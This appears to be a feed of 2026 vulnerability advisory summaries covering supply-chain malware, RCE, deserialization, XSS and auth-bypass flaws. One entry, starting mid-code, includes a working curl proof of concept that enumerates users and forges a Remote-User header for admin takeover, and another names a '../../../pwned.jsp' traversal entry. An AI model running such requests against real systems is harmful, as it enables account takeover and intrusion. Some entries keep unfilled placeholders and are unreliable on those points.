Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actions exploitation. Attackers combined pull_request_target misconfiguration, Actions cache poisoning, and OIDC token memory extraction to publish malicious code under the legitimate TanStack identity. Installing any affected version executes a 2.3 MB obfuscated payload that exfiltrates AWS/GCP/Kubernetes credentials, npm tokens, GitHub secrets, SSH keys, and HashiCorp Vault tokens over encrypted Session/Oxen messenger infrastructure. The payload propagates by republishing victim-maintained packages with identical injection. Socket.dev and the TanStack team confirmed the incident via GHSA-g7cv-rxg3-hmpx. No EPSS or CISA KEV data available for this recent supply-chain attack. CVSS 9.6 reflects the cross-scope credential theft impact (S:C/C:H/I:H), though exploitation requires user-initiated package installation (UI:R).
Unauthenticated remote code execution in Dalfox REST API server mode (versions ≤2.12.0) allows network attackers to execute arbitrary OS commands by injecting shell payloads via the `found-action` parameter in POST /scan requests. The server binds to 0.0.0.0:6664 by default with no API key enforcement unless explicitly configured, and deserializes attacker-controlled JSON directly into execution-control options without sanitization. Attackers trivially guarantee exploitation by hosting a reflective XSS endpoint to trigger the injected command. Fixed in version 2.13.0. CVSS 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). EPSS data not available; no CISA KEV listing at time of analysis. Public exploit code exists (detailed proof-of-concept published in GitHub advisory GHSA-v25v-m36w-jp4h).
Stack-based buffer overflow in Windows Netlogon allows an unauthorized attacker to execute code over a network.
Exim before 4.99.3, in certain GnuTLS configurations, has a remotely reachable use-after-free in the BDAT body parsing path. It is triggered when a client sends a TLS close_notify mid-body during a CHUNKING transfer, followed by a final cleartext byte on the same TCP connection. This can lead to heap corruption. An unauthenticated network attacker exploiting this vulnerability could execute arbitrary code.
Plaintext TOTP secret exposure in sealed-env enterprise mode allows remote unauthenticated attackers to extract operator authentication credentials from base64-decoded JWS tokens. Versions 0.1.0-alpha.1 through 0.1.0-alpha.3 embed literal TOTP secrets in every minted unseal token's JWS payload without encryption, enabling credential harvesting from CI logs, container environments, monitoring tools, and log aggregators. Fixed in version 0.1.0-alpha.4. CVSS 9.1 (Critical) with network vector and no authentication required. No CISA KEV listing or public exploit code identified at time of analysis, but exploitation requires only base64 decoding of observable tokens.
Stored cross-site scripting (XSS) in Siemens SIMATIC S7-1500 and ET 200SP controller families allows authenticated attackers with high privileges to inject malicious scripts via Technology Object (TO) names when downloading TIA Portal projects. The scripts execute when authorized users access the Motion Control Diagnostics web interface page, enabling session hijacking, credential theft, or privileged actions performed under the victim's context. This affects over 100 product variants across industrial automation controllers, software controllers, and open controllers. No active exploitation confirmed (not in CISA KEV). EPSS score not provided in dataset. CVSS 4.0 score of 9.3 reflects high impact across confidentiality, integrity, and availability in both vulnerable and subsequent systems.
Stored cross-site scripting in Siemens SIMATIC S7-1500 controller family web interface allows authenticated high-privilege attackers to inject malicious code via crafted PLC/station names in TIA project files. When users with appropriate rights later access the communication parameters page, injected scripts execute in their session context with high impact to confidentiality, integrity, and availability across system boundaries (CVSS 9.3, CVSS:4.0 S:H). No public exploit identified at time of analysis, but CVSS vector indicates low attack complexity (AC:L) once attacker gains privileged project upload access.
Improper control of generation of code ('code injection') in Microsoft Dynamics 365 (on-premises) allows an authorized attacker to execute code over a network.
Improper access control in Azure Logic Apps allows an authorized attacker to elevate privileges over a network.
Heap-based buffer overflow in Microsoft Windows DNS allows an unauthorized attacker to execute code over a network.
Spoofing vulnerability in Microsoft Azure Entra ID (formerly Azure Active Directory) enables remote unauthenticated attackers to obtain sensitive authentication information via network-based attacks requiring user interaction. The vulnerability affects Microsoft Enterprise Security Token Service (ESTS), the authentication backbone of Azure Entra ID, with scope change indicating potential cross-domain impact. Microsoft has released a patch per MSRC advisory. CVSS 9.3 (Critical) reflects network accessibility, low complexity, and high confidentiality/integrity impact with changed scope.
Use after free in Windows Hyper-V allows an unauthorized attacker to elevate privileges locally.
Incorrect implementation of authentication algorithm in Microsoft SSO Plugin for Jira & Confluence allows an unauthorized attacker to elevate privileges over a network.
Execution with unnecessary privileges in Microsoft Dynamics 365 (on-premises) allows an authorized attacker to execute code over a network.
Authentication bypass in Microsoft Azure SDK for Java allows remote unauthenticated attackers to circumvent security controls over the network without user interaction. The vulnerability exposes confidentiality and integrity of Azure services to unauthorized access, with confirmed vendor patch available. CVSS 9.1 reflects critical network-based exploitation against default configurations, though no active exploitation (CISA KEV) or public POC has been identified at time of analysis.
ChurchCRM is an open-source church management system. Prior to 7.3.2, The fix for CVE-2026-39337 is incomplete. The pre-authentication remote code execution vulnerability in ChurchCRM's setup wizard via unsanitized DB_PASSWORD remains fully exploitable This vulnerability is fixed in 7.3.2.
Adobe Connect versions 2025.9.15, 2025.8.157 and earlier are affected by a Deserialization of Untrusted Data vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue requires user interaction in that a victim must visit a maliciously crafted URL or interact with a compromised web page. Scope is changed.
arduino-esp32 is an Arduino core for the ESP32, ESP32-S2, ESP32-S3, ESP32-C3, ESP32-C6 and ESP32-H2 microcontrollers. Prior to 3.3.8, the WebServer multipart form parser in arduino-esp32 allocates a Variable Length Array (VLA) on the stack whose size is derived from an attacker-controlled HTTP header field (Content-Type: multipart/form-data; boundary=...) without enforcing any length limit. Sending a boundary string longer than ~8000 characters overflows the 8192-byte task stack of the loopTask, causing a crash and potential remote code execution. This vulnerability is fixed in 3.3.8.
Remote code execution in TinyZero's HDFS utilities allows unauthenticated attackers to execute arbitrary OS commands via crafted file paths passed through the Hydra configuration framework. The vulnerability stems from unsanitized user input directly interpolated into os.system() shell commands within the _copy() function, affecting all deployments through commit 6652a63c57fa. No active exploitation confirmed at time of analysis, but EPSS score of 0.14% (33rd percentile) suggests below-average likelihood despite CVSS:9.8 critical rating. The attack requires network access to the TinyZero training process and ability to control path parameters via configuration.
Remote code execution in Horovod distributed training framework (versions through 0.28.1) allows unauthenticated network attackers to execute arbitrary code on worker nodes by injecting malicious pickle payloads into the KVStore HTTP server. The vulnerability combines unauthenticated write access to the KVStore coordination server with unsafe deserialization using cloudpickle.loads(), enabling trivial exploitation against any reachable Horovod cluster. EPSS score of 0.12% (31st percentile) suggests low widespread exploitation probability despite critical CVSS 9.8 rating, and no active exploitation confirmed (not in CISA KEV). Public exploit development is highly feasible given the straightforward attack path and publicly documented details.
{ if (!request.session) { return false; } const remoteUser = request.get(header); // reads any header from any client if (!remoteUser) { return false; } const userHandles = await getAllUserHandles(); for (const userHandle of userHandles) { if (remoteUser.toLowerCase() === userHandle) { const user = await storage.getItem(toKey(userHandle)); if (user && user.enabled) { request.session.handle = userHandle; return true; } } } return false; } ``` `request.get(header)` is Express's wrapper for `req.headers[name.toLowerCase()]`. Express does not distinguish between headers set by a trusted upstream proxy and headers injected by the end client. Without an IP allowlist check, any client can set `Remote-User: ` and receive an authenticated session cookie. The `/api/users/list` endpoint is registered before `requireLoginMiddleware` in `src/server-main.js:236`, making it publicly accessible without authentication: `src/server-main.js:236,239`: ```js app.use('/api/users', usersPublicRouter); // line 236 (public) app.use(requireLoginMiddleware); // line 239 (auth gate) ``` `src/endpoints/users-public.js:26-57`: ```js router.post('/list', async (_request, response) => { if (DISCREET_LOGIN) { return response.sendStatus(204); } const users = await storage.values(x => x.key.startsWith(KEY_PREFIX)); return response.json(viewModels); // returns handle, name, avatar, admin, password flags }); ``` This allows an attacker to enumerate all user handles (including admin handles) without any prior credentials. ```bash TARGET="http://localhost:8000" curl -s -X POST "$TARGET/api/users/list" -H "Content-Type: application/json" -d '{}' curl -s -L \ -H "Remote-User: admin-user" \ -c /tmp/st-session.txt \ "$TARGET/login" TOKEN=$(curl -s -b /tmp/st-session.txt "$TARGET/csrf-token" | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])") curl -s -X POST "$TARGET/api/users/admin/get" \ -H "Content-Type: application/json" \ -H "X-CSRF-Token: $TOKEN" \ -b /tmp/st-session.txt \ -d '{}' ``` --- An account takeover, allowing an attacker to do anything a legitimately authorized user can do.
Arbitrary code execution in Ludwig framework ≤0.10.4 occurs when attackers supply malicious pickle files to the predict() method, which deserializes untrusted data without validation using pandas.read_pickle(). Remote unauthenticated attackers can achieve full system compromise by exploiting the automatic file format detection mechanism that processes .pkl files through Python's unsafe pickle module. EPSS score of 0.06% (19th percentile) suggests low current exploitation likelihood despite the critical CVSS 9.8 rating, though no public exploit code or active exploitation has been identified at time of analysis.
Remote code execution in Adversarial Robustness Toolbox (ART) through version 1.20.1 allows unauthenticated network attackers to execute arbitrary Python code by uploading malicious PyTorch model files to pipeline-accessible object storage locations. The vulnerability stems from unsafe use of torch.load() without the weights_only=True parameter in the Kubeflow component's model loading process, enabling Pickle deserialization of arbitrary objects. With CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) but only 0.06% EPSS exploitation probability (19th percentile), this represents a critical-severity issue with low observed real-world targeting, likely due to the specialized nature of ML robustness evaluation deployments. No active exploitation confirmed (not in CISA KEV) and no public exploit code identified at time of analysis.
Arbitrary code execution via torch-checkpoint-shrink.py script in ml-engineering project allows remote attackers to execute malicious Python code by providing crafted PyTorch checkpoint files. The vulnerability stems from insecure deserialization where torch.load() processes .pt files without the weights_only=True safeguard, enabling pickle-based arbitrary object instantiation. Despite a critical CVSS 9.8 score, EPSS probability is low (0.06%, 19th percentile) and no public exploit or active exploitation is confirmed, suggesting limited real-world targeting to date. SSVC assessment indicates total technical impact with automatable exploitation potential, making this a priority for organizations using ml-engineering scripts in production environments.
Remote code execution in Cognee v0.4.0 and earlier allows unauthenticated attackers to execute arbitrary Python code via the notebook cell execution API endpoint. The vulnerability stems from unsafe use of Python's exec() function without sandboxing or validation, enabling complete system compromise with server process privileges. While not actively exploited (not in KEV), the vulnerability is automatable with total technical impact per SSVC framework, though EPSS indicates low exploitation probability at 0.06%.
Remote code execution in Adversarial Robustness Toolbox (ART) versions through 1.20.1 allows unauthenticated network attackers to execute arbitrary Python code via unsafe eval() usage in the Kubeflow robustness evaluation component. The vulnerability accepts unsanitized user input for LossFn and Optimizer parameters in PyTorch model evaluations, enabling complete system compromise. With CVSS 9.8 but only 0.06% EPSS score (18th percentile), this represents a severe theoretical risk that has not yet manifested in widespread exploitation. No public exploit code identified at time of analysis, and the vulnerability requires specific deployment of ART's Kubeflow integration component.
Remote code execution in Guardrails AI through version 0.6.7 occurs when installing validator packages via the Hub mechanism. The guardrails hub install command dynamically executes post-installation scripts from Hub manifests without validating the script path or content, allowing attackers who publish malicious packages to achieve arbitrary code execution on victim systems during package installation. With CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) but only 0.06% EPSS (18th percentile), this represents a supply chain attack requiring user-initiated installation rather than widespread automated exploitation. No active exploitation confirmed (not in CISA KEV), and patch availability not confirmed from available data.
Critical unauthenticated access control bypass in Fortinet FortiAuthenticator versions 6.5.0-6.5.6, 6.6.0-6.6.8, 8.0.0, and 8.0.2 enables remote code execution without authentication. The CVSS score of 9.8 with AV:N/AC:L/PR:N/UI:N indicates trivial remote exploitation against default configurations. While the vendor advisory (FG-IR-26-128) confirms this vulnerability, the incomplete description placeholder ('<insert attack vector here>') suggests the advisory may contain additional details not yet published in CVE records. No public exploit code or active exploitation confirmed at time of analysis, though the authentication bypass nature and maximum CVSS scores make this a priority patching target for organizations running FortiAuthenticator.
Remote code execution in Fortinet FortiSandbox 4.4.x through 5.0.x (on-premises, Cloud, and PaaS deployments) allows unauthenticated attackers to execute arbitrary code or commands via crafted HTTP requests. This CWE-862 missing authorization flaw affects sandbox analysis appliances across multiple deployment models with CVSS 9.8 (critical) severity. Fortinet has published vendor advisory FG-IR-26-136. No CISA KEV listing or public POC identified at time of analysis, though the trivial attack complexity (AC:L) and network vector without authentication (PR:N) indicate high exploitability if technical details emerge.
Cleanuparr is a tool for automating the cleanup of unwanted or blocked files in Sonarr, Radarr, and supported download clients like qBittorrent. Prior to 2.9.10, TrustedNetworkAuthenticationHandler.ResolveClientIp parses the leftmost entry of the X-Forwarded-For header as the client IP. That entry is attacker-controlled - X-Forwarded-For is append-only, so the leftmost value is whatever the original HTTP client claimed. By sending a spoofed local IP in the header, an unauthenticated remote attacker passes the trusted-network check and is logged in as the Cleanuparr administrator. This vulnerability is fixed in 2.9.10.
Remote code execution in PySyft Datasite/Server versions 0.9.5 and earlier allows unauthenticated attackers to execute arbitrary Python code on the server through the function submission mechanism. The vulnerability stems from insufficient validation and sandboxing of user-submitted Python functions decorated with @sy.syft_function(), which are executed using unsafe exec() and eval() calls after approval. With an EPSS score of 0.04% and no current KEV listing, this appears to be a high-severity vulnerability without confirmed active exploitation.
DEPRECATED: Authentication Bypass Issues vulnerability in digest authentication in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.21, from 10.1.0-M1 through 10.1.54, from 9.0.0.M1 through 9.0.117, from 8.5.0 through 8.5.100, from before 7.0.0. Older unsupported versions any also be affect Users are recommended to upgrade to version 11.0.22, 10.1.55 or 9.0.118 which fix the issue.
Improper Input Validation vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.21, from 10.1.0-M1 through 10.1.54, from 9.0.0.M1 through 9.0.117, from 10.0.0-M1 through 10.0.27. Older, end of support versions may also be affected. Users are recommended to upgrade to version [FIXED_VERSION], which fixes the issue.
JunoClaw agentic AI platform exposes BIP-39 wallet mnemonics in plaintext through LLM tool-call parameters, leaking cryptocurrency private keys to logs, telemetry, and transport channels between AI providers and blockchain execution. Every blockchain write operation (token transfers, smart contract deployment, IBC transactions) required the 12- or 24-word seed phrase as a JSON parameter visible to the language model, API logs, and any middleware. Version 0.x.y-security-1 eliminates mnemonic exposure by introducing a wallet registry with AES-256-GCM encrypted storage and opaque wallet_id references. EPSS data not available for this recent CVE; no public exploit identified at time of analysis.
SQL injection in Akilli Commerce E-Commerce Website versions before 4.5.001 allows remote unauthenticated attackers to execute arbitrary SQL commands with complete database access. The vulnerability permits extraction of sensitive customer and transaction data, modification of product catalogs and pricing, and potential complete system compromise. CVSS score of 9.8 (Critical) reflects network-accessible exploitation requiring no authentication or user interaction, though no active exploitation has been reported in CISA KEV and EPSS data is not available.
Arbitrary code execution in imgaug library (versions through 0.4.0) occurs when the BackgroundAugmenter class deserializes malicious pickle payloads without validation in its multiprocessing worker method. Attackers who can influence queue data-through compromised shared queues, malicious input scripts, or social engineering-can achieve remote or local code execution depending on deployment context. CVSS 9.8 critical severity reflects network-based exploitation without authentication, though EPSS probability is low (0.02%, 6th percentile), indicating limited observed exploitation activity. No CISA KEV listing or public exploit code identified at time of analysis.
Remote code execution in Ludwig framework ≤0.10.4 allows unauthenticated network attackers to execute arbitrary code by supplying a malicious PyTorch model file to the ludwig serve endpoint. The vulnerability stems from unsafe deserialization in the model loading component, which uses torch.load() without the weights_only=True safety parameter. With CVSS 9.8 (critical network vector, no authentication required) but only 0.02% EPSS, this represents a high-severity issue in vulnerable deployments, though widespread exploitation has not been observed. No CISA KEV listing or public POC identified at time of analysis.
Arbitrary code execution in optimate's neural_magic_training.py allows remote attackers to execute Python code by supplying a malicious directory path containing a crafted module.py file. The _load_model() function directly executes file contents via Python's exec() without validation. CVSS 9.8 reflects network vector with no authentication, but EPSS score of 0.02% (5th percentile) indicates very low observed exploitation probability. No active exploitation confirmed (not in CISA KEV). Vulnerability exists in commit a6d302f912b481c94370811af6b11402f51d377f from July 2024. Affects organizations using optimate for neural network model optimization.
Remote code execution in Mamba language model framework (through version 2.2.6) allows unauthenticated attackers to execute arbitrary Python code by publishing malicious models on HuggingFace Hub. When victims call MambaLMHeadModel.from_pretrained() on a weaponized model repository, insecure pickle deserialization executes attacker-controlled code in the context of the victim's process. Despite the critical CVSS 9.8 score and network attack vector requiring no authentication, EPSS probability remains extremely low (0.02%, 5th percentile), suggesting limited real-world exploitation to date. No CISA KEV listing or public POC identified at time of analysis.
Arbitrary code execution occurs in the llm CLI tool (versions through 0.27.1) when attackers social-engineer victims into running crafted commands containing malicious Python code in the --functions argument. The tool directly executes this code via unsafe exec() without sanitization, enabling full system compromise. CVSS 9.8 assigns network attack vector and no authentication, but real-world exploitation requires local command execution by a tricked user, creating a significant disparity between the vector and actual attack prerequisites. EPSS score of 0.02% (5th percentile) suggests minimal automated exploitation risk, and no active exploitation or public POC has been identified at time of analysis.
Command injection in Adversarial Robustness Toolbox (ART) up to version 1.20.1 enables remote code execution through unsafe eval() usage in Kubeflow pipeline components. The robustness_evaluation_fgsm_pytorch.py script directly evaluates user-controlled --clip_values and --input_shape arguments without sanitization, allowing Python code injection. With CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) indicating network-exploitable unauthenticated access, this represents critical risk in automated ML pipeline environments where attackers can control pipeline configurations. EPSS score of 0.02% (5th percentile) suggests low observed exploitation activity, though the attack vector and ML tooling context create significant supply chain risk in CI/CD and research environments.
Sandbox escape in the Profile Backup component. This vulnerability was fixed in Firefox 150.0.3.
Remote code execution in Kubectl MCP Server v1.1.1 allows unauthenticated network attackers to execute arbitrary commands on systems running the vulnerable server through crafted HTML-based exploitation vectors. Despite a critical 9.8 CVSS score, EPSS rates exploitation likelihood at only 0.02% (4th percentile), suggesting limited real-world targeting thus far. The vulnerability is classified as CWE-94 (Code Injection), affecting an open-source Model Context Protocol (MCP) server implementation for Kubernetes management. No CISA KEV listing indicates absence of confirmed widespread exploitation at time of analysis.
Path traversal in Ivanti Xtraction enables remote authenticated attackers with low-level privileges to read sensitive system files and inject arbitrary HTML into web-accessible directories, creating risks of credential theft, configuration exposure, and client-side attacks against other users. CVSS 9.6 severity driven by scope change (S:C) indicates the attacker can impact resources beyond the vulnerable component. No public exploit or CISA KEV listing identified, but vendor advisory confirms the vulnerability affects all versions prior to 2026.2.
ChurchCRM is an open-source church management system. From 7.2.0 to 7.2.2, The fix for CVE-2026-4058 is incomplete. The hardening commit was merged and then silently stripped from src/api/routes/public/public-user.php by an unrelated PR before any 7.2.x tag was cut. Every shipped 7.2.x release therefore remains exploitable by the PoC published with the original advisory. This vulnerability is fixed in 7.3.1.
Arbitrary server-side code execution in SAP Commerce Cloud via unauthenticated malicious configuration upload and code injection. Attackers can remotely exploit a misconfigured Spring Security framework to upload crafted configuration files and inject code without authentication, requiring only that a user interact with malicious content (CVSS:3.1/AV:N/AC:L/PR:N/UI:R). The vulnerability affects SAP Commerce Cloud Configuration with critical impact across confidentiality, integrity, and availability. No public exploit code or CISA KEV listing identified at time of analysis, though EPSS data unavailable. Patch details available in SAP Security Note 3733064.
SQL injection in SAP S/4HANA Enterprise Search for ABAP allows authenticated attackers to extract sensitive database information and crash the application via malicious SQL statements injected through improperly validated user input. The scope change (S:C) indicates potential lateral movement beyond the vulnerable component. SAP has released security patches (SAP Note 3724838) for this critical vulnerability with CVSS 9.6. No active exploitation confirmed at time of analysis, though the authentication bypass tag suggests potential credential bypass implications.
An administrative user with access to configure webhooks can execute arbitrary commands by configuring and then triggering webhooks containing specific FreeMarker template syntax. This issue affects all MongoDB Ops Manager 7.0 versions and MongoDB Ops Manager versions 8.0.22 and prior.
Adobe Connect versions 2025.9.15, 2025.8.157 and earlier are affected by an Incorrect Authorization vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to inject malicious scripts into a web page, potentially gaining elevated access or control over the victim's account or session. Exploitation of this issue requires user interaction in that a victim must visit a maliciously crafted URL or interact with a compromised web page. Scope is changed.
efw4.X is an Enterprise Framework for Web. Prior to 4.08.010, efw.file.FileManager.unZip writes zip entries to disk using new File(baseDir, zipEntry.getName()) with no canonical-path check. An entry name such as ../../../pwned.jsp escapes the intended extraction directory and lands anywhere the Tomcat process can write - including the servlet context root. Combined with the framework's multipart /uploadServlet and an event that calls file.saveUploadFiles + FileManager.unZip, a remote attacker with no credentials drops a JSP webshell and executes arbitrary commands as the Tomcat user. This vulnerability is fixed in 4.08.010.